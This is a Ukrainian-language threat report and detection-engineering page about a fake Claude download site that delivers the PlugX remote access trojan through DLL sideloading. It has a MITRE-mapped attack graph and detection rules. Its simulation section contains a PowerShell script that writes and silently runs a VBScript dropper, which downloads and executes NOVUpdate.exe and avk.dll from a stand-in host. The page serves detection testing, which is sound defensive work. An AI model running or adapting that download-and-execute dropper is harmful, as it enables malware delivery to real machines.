Фейковий сайт Claude встановлює зловмисне ПЗ, яке надає атакуючим доступ до вашого комп’ютера
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Нападники створили підроблену сторінку завантаження Claude, яка доставила троянську ZIP-архів для нічого не підозрюючих користувачів. При відкритті архів установлював на перший погляд легітимний десктопний клієнт Claude, приховано розгортаючи PlugX remote access trojan через підвантаження DLL з підписаним G DATA updater. Шкідливий код був розміщений у папці автозавантаження користувача для підтримки персистентності, а потім ініціював вихідний HTTPS зв’язок з командним і керуючим сервером. Кампанія демонструє, як актори загроз все частіше використовують інтерес до популярних AI-інструментів як соціальну інженерну приманку для початкового компрометації.
Розслідування
Під час аналізу дослідники розпакували ZIP-архів, ідентифікували шлях установки MSI та простежили виконання до VBScript dropper, який записував NOVUpdate.exe, шкідливу avk.dll, та зашифрований файл даних у папку автозавантаження. Виконання в пісочниці підтвердило успішний запуск підвантаженого бінарніка, зміну TCP/IP-пов’язаного ключа реєстру та ініціацію вихідних з’єднань через порт 443 до IP-адреси, розміщеної на Alibaba Cloud. Ці знахідки підтвердили доставку PlugX через поетапний ланцюг зараження, замаскований під легітимне AI програмне забезпечення.
Пом’якшення
Користувачам слід завантажувати програмне забезпечення Claude лише з перевірених офіційних джерел і перевіряти автентичність інсталяційних пакетів перед виконанням. Захисники повинні перевіряти папки автозавантаження на предмет неочікуваних бінарників або DLL, особливо файлів, які імітують легітимні компоненти оновлення. Також слід переглянути телеметрію брандмауера та кінцевих точок для перевірки підозрілих вихідних HTTPS трафіків, пов’язаних з нововстановленими додатками. Видалення шкідливих файлів, реверсування будь-яких несанкціонованих змін у реєстрі та запуск надійної антивірусної перевірки є ключовими кроками для стримування загрози.
Відповідь
Команди безпеки повинні виявляти та повідомляти про присутність NOVUpdate.exe, avk.dll, або NOVUpdate.exe.dat в директорії автозавантаження. Додаткові детектори повинні зосереджуватися на підписаних G DATA updater бінарниках, які завантажують ненадійні DLL та встановлюють неочікувані вихідні TLS-сесії з ідентифікованою інфраструктурою. Уражені хости повинні пройти повну ліквідацію та судово-експертизу, щоб підтвердити, що жодні інші компоненти PlugX, механізми персистентності або наступні корисні навантаження не залишаються активними.
graph TB %% Class definitions classDef technique fill:#ffdd99 classDef file fill:#c2f0c2 classDef script fill:#d9d9ff classDef process fill:#f0c2c2 classDef persistence fill:#ffd9b3 classDef c2 fill:#b3e5fc classDef evasion fill:#e6b3ff classDef registry fill:#ffe699 %% Nodes u2013 Files and Artifacts node_spoofed_website[“<b>Файл</b> – Підроблений сайт Claude<br/>Розміщує шкідливий ZIP”]:::file node_malicious_zip[“<b>Файл</b> – Шкідливий ZIP<br/>Містить троянізований MSI-інсталятор”]:::file node_msi_installer[“<b>Файл</b> – Троянізований MSI-інсталятор”]:::file node_vbscript[“<b>Скрипт</b> – Claude AI.vbs<br/>Копіює файли, запускає Claude, забезпечує персистентність”]:::script node_novupdate_exe[“<b>Файл</b> – NOVUpdate.exe<br/>Легітимний оновлювач G DATA, використаний для DLL sideloading”]:::file node_avk_dll[“<b>Файл</b> – avk.dll<br/>Шкідлива DLL, що завантажується оновлювачем”]:::file node_dat_file[“<b>Файл</b> – NOVUpdate.exe.dat<br/>Зашифрований payload”]:::file node_startup_folder[“<b>Файл</b> – Папка Startup<br/>Місце призначення для скопійованих файлів”]:::file node_shortcut[“<b>Файл</b> – Claude AI.lnk<br/>Ярлик робочого столу, що запускає VBScript”]:::file node_cleanup_batch[“<b>Файл</b> – cleanup.bat<br/>Видаляє шкідливі артефакти після виконання”]:::file node_registry_key[“<b>Реєстр</b> – HKLM\System\CurrentControlSet\Services\Tcpip\Parameters”]:::registry %% Nodes u2013 Techniques node_initial_access[“<b>Техніка</b> – T1204.002 Виконання користувачем<br/>Жертва завантажує ZIP і запускає MSI”]:::technique node_execution[“<b>Техніка</b> – T1059.005 Visual Basic<br/>Виконує шкідливий VBScript”]:::technique node_persistence_startup[“<b>Техніка</b> – T1037.005 Startup Items<br/>Копіює файли в папку Startup”]:::persistence node_persistence_shortcut[“<b>Техніка</b> – T1547.009 Модифікація ярлика<br/>Створює та замінює ярлик”]:::persistence node_appcert_dll[“<b>Техніка</b> – T1546.009 AppCert DLL<br/>DLL sideloading через оновлювач G DATA”]:::evasion node_obfuscation[“<b>Техніка</b> – T1027.009 Обфусковані файли<br/>.dat payload розшифровується під час виконання”]:::evasion node_registry_mod[“<b>Техніка</b> – T1012 Запит до реєстру<br/>Модифікує параметри TCP/IP”]:::registry node_c2_proxy[“<b>Техніка</b> – T1090.002 Проксі<br/>HTTPS через зовнішній проксі”]:::c2 node_c2_web[“<b>Техніка</b> – T1102 Веб-сервіс<br/>Комунікація через HTTPS”]:::c2 node_indicator_removal[“<b>Техніка</b> – T1070.010 Видалення індикаторів<br/>Batch-файл видаляє скрипт і себе”]:::evasion %% Flow Connections node_spoofed_website –>|hosts| node_malicious_zip node_malicious_zip –>|delivered via| node_msi_installer node_msi_installer –>|drops| node_vbscript node_msi_installer –>|drops| node_novupdate_exe node_msi_installer –>|drops| node_avk_dll node_msi_installer –>|drops| node_dat_file node_initial_access –>|leads to| node_msi_installer node_vbscript –>|executes| node_execution node_execution –>|enables| node_persistence_startup node_execution –>|creates| node_shortcut node_persistence_startup –>|copies to| node_startup_folder node_startup_folder –>|contains| node_novupdate_exe node_startup_folder –>|contains| node_avk_dll node_startup_folder –>|contains| node_dat_file node_persistence_shortcut –>|creates| node_shortcut node_persistence_shortcut –>|replaces with clean| node_shortcut node_appcert_dll –>|loads| node_avk_dll node_obfuscation –>|decrypts| node_dat_file node_registry_mod –>|modifies| node_registry_key node_c2_proxy –>|uses| node_c2_web node_indicator_removal –>|creates| node_cleanup_batch node_cleanup_batch –>|deletes| node_vbscript node_cleanup_batch –>|deletes| node_msi_installer %% Class Assignments class node_initial_access technique class node_execution technique class node_persistence_startup persistence class node_persistence_shortcut persistence class node_appcert_dll evasion class node_obfuscation evasion class node_registry_mod registry class node_c2_proxy c2 class node_c2_web c2 class node_indicator_removal evasion
Потік атаки
Виявлення
LOLBAS WScript / CScript (через process_creation)
Переглянути
Можливе використання затримки часового відліку для відкладеного виконання (через cmdline)
Переглянути
Підозрілі бінарні / скрипти в місцях автозавантаження (через file_event)
Переглянути
IOCs (HashSha256) для виявлення: Підроблений сайт Claude встановлює шкідливе ПЗ, що надає зловмисникам доступ до вашого комп’ютера
Переглянути
IOCs (SourceIP) для виявлення: Підроблений сайт Claude встановлює шкідливе ПЗ, що надає зловмисникам доступ до вашого комп’ютера
Переглянути
IOCs (DestinationIP) для виявлення: Підроблений сайт Claude встановлює шкідливе ПЗ, що надає зловмисникам доступ до вашого комп’ютера
Переглянути
Виявлення WScript Dropping і виконує NOVUpdate.exe [Створення процесу Windows]
Переглянути
Виявлення троянського інсталятора з підробленого сайту Claude [Подія файлу Windows]
Переглянути
Виконання симуляції
Передумова: перевірка телеметрії та базової лінії повинна пройти успішно.
Обґрунтування: У цьому розділі описується точне виконання методики супротивника (TTP), розроблене для спрацьовування правила виявлення. Команди та оповідання МАЮТЬ безпосередньо відображати визначені TTP та націлені на генерацію точної телеметрії, очікуваної в логіці виявлення. Абстрактні або несумісні приклади призведуть до неправильного діагнозу.
-
Оповідання про атаку та команди:
Зловмисник створює шкідливий VBS скрипт, який завантажує корисне навантаженняNOVUpdate.exeз командно-керуючого (C2) сервера, записує його в%TEMP%, а потім запускає його черезwscript.exe. Той самий скрипт також завантажуєavk.dllз того ж місця, щоб досягти підвантаження DLL. Зловмисник покладається на вбудований Windows Script Host (WSH), щоб уникнути підозри традиційних антивірусних евристик.- Записати шкідливий VBS файл (
malicious.vbs) в%TEMP%. - Викликати
wscript.exeз шляхом до VBS файла. - VBS скрипт виконує HTTP GET для отримання
NOVUpdate.exeandavk.dll, записує їх на диск і виконуєNOVUpdate.exe.
- Записати шкідливий VBS файл (
-
Скрипт регресійного тесту:
# -------------------------------------------------------------------- # Симуляція шкідливого dropper – тригери правил Sigma # -------------------------------------------------------------------- $tempDir = "$env:TEMPDropperDemo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. Створити шкідливий VBS, який завантажує два файли та запускає NOVUpdate.exe $vbsPath = "$tempDirmalicious.vbs" $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.open "GET", "http://example.com/NOVUpdate.exe", False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$tempDirNOVUpdate.exe", 2 objStream.Close End If
‘ Завантажити avk.dll (використовується для підвантаження DLL) objXML.open “GET”, “http://example.com/avk.dll“, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(“ADODB.Stream”) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile “$tempDiravk.dll”, 2 objStream.Close End If
‘ Виконати скинути EXE CreateObject(“WScript.Shell”).Run “””$tempDirNOVUpdate.exe”””, 0, False “@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Запустити скрипт через wscript.exe (це та телеметрія, яку ми тестуємо)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# OPTIONAL: зупинити для дозволу на виконання
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
-
Команди очищення:
# Видалити всі артефакти, створені симуляцією $tempDir = "$env:TEMPDropperDemo" if (Test-Path $tempDir) { Remove-Item -Path $tempDir -Recurse -Force } # Забезпечити завершення всіх залишків процесів NOVUpdate.exe Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force